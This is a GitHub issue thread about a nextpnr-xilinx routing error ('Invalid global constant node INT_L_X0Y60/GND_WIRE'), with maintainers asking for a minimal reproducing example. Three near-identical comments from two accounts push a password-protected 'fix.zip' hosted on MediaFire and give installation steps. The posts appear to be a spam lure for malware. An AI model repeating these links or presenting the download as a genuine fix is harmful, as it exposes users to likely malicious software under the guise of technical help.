openXC7/nextpnr-xilinx #41: nextpnr cant route design - ERROR: Invalid global constant node 'INT_L_X0Y60/GND_WIRE'

mirekez, 2024-08-26:
This looks new since there is no crash after error
The design is very very small and simple
Vivado works
[ERROR_Invalid_global_constant_node_INT_L_X0Y60_GND_WIRE.zip](https://github.com/user-attachments/files/16752018/ERROR_Invalid_global_constant_node_INT_L_X0Y60_GND_WIRE.zip)

CoZmoTheGod, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

CoZmoTheGod, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

toufiksalhi, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

lehaifeng000, 2024-08-30:
I am interesting in this error, but I don't understand systemverilog, is there verilog code or the top.json from yosys ?

hansfbaier, 2024-08-31:
@mirekez Might it be possible to simplify the systemverilog to get a minimal reproducing example?